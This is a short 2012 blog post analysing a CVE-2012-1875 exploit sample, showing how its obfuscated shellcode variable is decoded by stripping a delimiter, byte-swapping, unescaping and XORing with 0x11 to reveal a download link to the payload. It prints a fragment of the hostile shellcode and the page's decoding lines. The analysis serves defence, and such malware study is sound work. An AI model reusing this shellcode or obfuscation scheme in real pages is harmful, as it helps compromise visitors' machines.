Wednesday, June 20, 2012

CVE-2012-1875 Encoded Reach Back Decoding



One of the first things I do when I get a new exploit sample (e.g. CVE-2012-1875), is try to determine what (or where) the payload is, after which I'll try to obtain it for further analysis.  In the case of the two samples provided by Contagio (http://contagiodump.blogspot.com/2012/06/cve-2012-1875-links-and-samples.html), I looked through the html pages in search of an "in the clear" redirect or a script.  Immediately, the variable "vbc" jumped out at me (see snippet below).

var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+
"NewYoukv21B0NewYoukv1111NewYoukv9A11NewYoukv1D51NewYoukv619ANewYoukvBC0DNewYoukv799ANewYoukv9A19NewYoukv7BE6NewYoukv4817NewYoukvB3F9NewYoukv1111NewYoukvF311NewYoukv51E8NewYoukv2991"+

The first thing that stands out is the delimiter "NewYoukv".  Once removed, we end up with something like this:
10EB4B5BC933B96601713480110BFAE205EBEBE8FFFFF8FF10131111754E21B011119A111D51619ABC0D799A9A197BE64817B3F91111F31151E82991

When approaching this in this manner, however, don't forget to swap the bytes (remember our good friend unicode?).  This will give us something like this:
EB105B4B33C966B9710180340B11E2FAEB05E8EBFFFFFFF8131011114E75B0211111119A511D9A610DBC9A79199AE67B1748F9B3111111F3E8519129

Or, we can always look down the html script a little to see what's going on with this variable:
- var xbc=vbc.replace(/NewYoukv/g,"%u");   
- var gjb=unescape(xbc);


We're not quite out of the woods yet though.  This is because we still need to XOR the script with 0x11 to reveal the reach back to the malicious payload.  The two pics below show a "before and after" comparison of the tail section of two different samples - the reach back is revealed in the "decoded" section.  Now all we gotta do is grab the two executable for analysis (before they are taken down) and implement the appropriate mitigation strategies.




No comments:

Post a Comment